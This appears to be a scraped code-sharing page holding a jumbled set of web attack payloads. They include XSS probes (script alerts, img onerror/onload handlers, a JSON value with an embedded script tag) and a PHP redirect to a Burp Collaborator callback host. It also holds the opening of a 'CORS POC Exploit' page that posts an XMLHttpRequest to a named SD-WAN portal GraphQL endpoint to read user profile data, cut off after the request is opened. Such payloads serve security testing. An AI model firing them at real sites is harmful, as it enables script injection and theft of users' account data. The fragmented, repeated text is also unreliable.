Skip to content

Instantly share code, notes, and snippets.

<script>alert(document.domain);</script>
{"data":"lollollol">}<img src=x>"}-->
<img src=x onerror=alert();>
<?php
header('Location: http://g5mroudjvatgtwp6jyn84jkosfy9my.burpcollaborator.net.com/test');
?>
<img src="data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=" onload=alert(1)>
@EDMPL
EDMPL / test.html
Last active November 30, 2020 21:51
<script>alert(document.domain);</script>
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Get User Profile Information</h3>
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://testbed-sdwanportal.m1net.com.sg/hms-sdwan-api/graphql', true);
<script>alert(document.domain);</script>
{"myJSON": "legit", "someParam": "12345<script>alert(1)</script>"}
<script>alert();</script>